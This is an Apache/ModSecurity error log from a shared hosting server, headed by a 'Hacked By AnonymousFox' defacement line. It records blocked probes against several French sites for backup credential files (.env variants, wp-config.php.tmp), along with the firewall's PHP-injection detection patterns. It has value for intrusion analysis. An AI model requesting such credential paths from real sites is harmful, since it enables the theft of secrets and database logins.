Hacked By AnonymousFox

[Mon May 11 11:18:37.039205 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: moncampingcarenli.cyrilethediresa.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.040279 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: moncampingcarenligne.cyrilethediresa.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.080083 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: happy-baby-box.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.081193 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: habilis.space:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.086513 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: domainedejanasse.com:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.101940 2026] [ssl:warn] [pid 2415603:tid 2415603] AH01909: totalcloud.fr:443:0 server certificate does NOT include an ID which matches the server name
[Mon May 11 11:18:37.108299 2026] [systemd:notice] [pid 2415603:tid 2415603] AH10497: SELinux is enabled; httpd running as context system_u:system_r:unconfined_service_t:s0
[Mon May 11 11:18:37.109486 2026] [mpm_worker:notice] [pid 2415603:tid 2415603] AH00292: Apache/2.4.67 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4 configured -- resuming normal operations
[Mon May 11 11:18:37.109507 2026] [core:notice] [pid 2415603:tid 2415603] AH00094: Command line: '/usr/sbin/httpd'
[Mon May 11 11:18:39.774500 2026] [security2:error] [pid 1254133:tid 1254147] [client 54.167.32.123:40487] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:annee. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:annee: <?php echo $year ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agGe7xjZymfuKpjWXehxRQAAAMs"]
[Mon May 11 11:18:39.774576 2026] [security2:error] [pid 1254133:tid 1254147] [client 54.167.32.123:40487] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>agenda/agenda.php?mois. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>agenda/agenda.php?mois: <?php echo $month -1; ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agGe7xjZymfuKpjWXehxRQAAAMs"]
[Mon May 11 11:18:39.775180 2026] [security2:error] [pid 1254133:tid 1254147] [client 54.167.32.123:40487] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agGe7xjZymfuKpjWXehxRQAAAMs"]
[Mon May 11 11:18:40.375755 2026] [security2:error] [pid 1254133:tid 1254147] [client 54.167.32.123:40487] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=10,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGe7xjZymfuKpjWXehxRQAAAMs"]
[Mon May 11 11:19:21.006719 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:3920] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jest/.env.config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/jest/.env.config.bak"] [unique_id "agGfGUYQeUtAPynIs6xNqgAAAAU"]
[Mon May 11 11:19:21.006942 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:3920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/jest/.env.config.bak"] [unique_id "agGfGUYQeUtAPynIs6xNqgAAAAU"]
[Mon May 11 11:19:22.167230 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:3920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfGUYQeUtAPynIs6xNqgAAAAU"]
[Mon May 11 11:19:22.195103 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:3934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jest/.env.config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/jest/.env.config.bak"] [unique_id "agGfGkRdw2n9wv6Ai4_9OgAAAJE"]
[Mon May 11 11:19:22.195329 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:3934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/jest/.env.config.bak"] [unique_id "agGfGkRdw2n9wv6Ai4_9OgAAAJE"]
[Mon May 11 11:19:23.414552 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:3934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfGkRdw2n9wv6Ai4_9OgAAAJE"]
[Mon May 11 11:19:27.466764 2026] [security2:error] [pid 1254242:tid 1254266] [client 101.33.80.42:44712] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/"] [unique_id "agGfH74KNmD_mZ_vlf8uFQAAAFU"]
[Mon May 11 11:19:32.493751 2026] [security2:error] [pid 1254179:tid 1254196] [client 101.33.80.42:51970] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agGfJGS6k_SCYd1AVZqkWQAAAQ8"], referer: http://www.habilis.space
[Mon May 11 11:19:42.771093 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:47832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /karma/.env.old.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/karma/.env.old.backup"] [unique_id "agGfLhjZymfuKpjWXehxmQAAAMA"]
[Mon May 11 11:19:42.771337 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:47832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/karma/.env.old.backup"] [unique_id "agGfLhjZymfuKpjWXehxmQAAAMA"]
[Mon May 11 11:19:43.926402 2026] [security2:error] [pid 1254133:tid 1254135] [client 185.177.72.9:47832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfLhjZymfuKpjWXehxmQAAAMA"]
[Mon May 11 11:19:43.953085 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:41206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /karma/.env.old.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/karma/.env.old.backup"] [unique_id "agGfL74KNmD_mZ_vlf8uKgAAAFA"]
[Mon May 11 11:19:43.953311 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:41206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/karma/.env.old.backup"] [unique_id "agGfL74KNmD_mZ_vlf8uKgAAAFA"]
[Mon May 11 11:19:45.203590 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:41206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfL74KNmD_mZ_vlf8uKgAAAFA"]
[Mon May 11 11:19:50.654496 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:41240] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /karma/wp-config.php.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/karma/wp-config.php.tmp"] [unique_id "agGfNhjZymfuKpjWXehxqQAAAMw"]
[Mon May 11 11:19:50.654704 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:41240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/karma/wp-config.php.tmp"] [unique_id "agGfNhjZymfuKpjWXehxqQAAAMw"]
[Mon May 11 11:19:52.846514 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:41240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfNhjZymfuKpjWXehxqQAAAMw"]
[Mon May 11 11:19:52.872576 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:41256] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /karma/wp-config.php.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/karma/wp-config.php.tmp"] [unique_id "agGfOGS6k_SCYd1AVZqkcQAAAQc"]
[Mon May 11 11:19:52.872794 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:41256] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/karma/wp-config.php.tmp"] [unique_id "agGfOGS6k_SCYd1AVZqkcQAAAQc"]
[Mon May 11 11:19:54.091232 2026] [security2:error] [pid 1254179:tid 1254188] [client 185.177.72.9:41256] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfOGS6k_SCYd1AVZqkcQAAAQc"]
[Mon May 11 11:19:54.671591 2026] [autoindex:error] [pid 1254212:tid 1254235] [client 20.193.146.159:54070] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:20:07.305122 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:25034] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.backup-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.backup-backup"] [unique_id "agGfRxjZymfuKpjWXehxswAAAMc"]
[Mon May 11 11:20:07.305347 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:25034] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.backup-backup"] [unique_id "agGfRxjZymfuKpjWXehxswAAAMc"]
[Mon May 11 11:20:09.113628 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:25034] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfRxjZymfuKpjWXehxswAAAMc"]
[Mon May 11 11:20:09.140138 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:25048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.backup-backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.backup-backup"] [unique_id "agGfSRjZymfuKpjWXehxtAAAANI"]
[Mon May 11 11:20:09.140378 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:25048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.backup-backup"] [unique_id "agGfSRjZymfuKpjWXehxtAAAANI"]
[Mon May 11 11:20:10.865886 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:25048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfSRjZymfuKpjWXehxtAAAANI"]
[Mon May 11 11:20:10.891904 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:25062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.old.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.old.dev"] [unique_id "agGfSr4KNmD_mZ_vlf8uWAAAAEY"]
[Mon May 11 11:20:10.892103 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:25062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.old.dev"] [unique_id "agGfSr4KNmD_mZ_vlf8uWAAAAEY"]
[Mon May 11 11:20:11.527833 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.213.247.229:43089] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGfS74KNmD_mZ_vlf8uXAAAAFY"], referer: https://www.piregwan-genesis.com/
[Mon May 11 11:20:13.268312 2026] [security2:error] [pid 1254242:tid 1254453] [client 185.177.72.9:25062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfSr4KNmD_mZ_vlf8uWAAAAEY"]
[Mon May 11 11:20:13.486055 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:32934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.old.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.old.dev"] [unique_id "agGfTWS6k_SCYd1AVZqkhQAAAQM"]
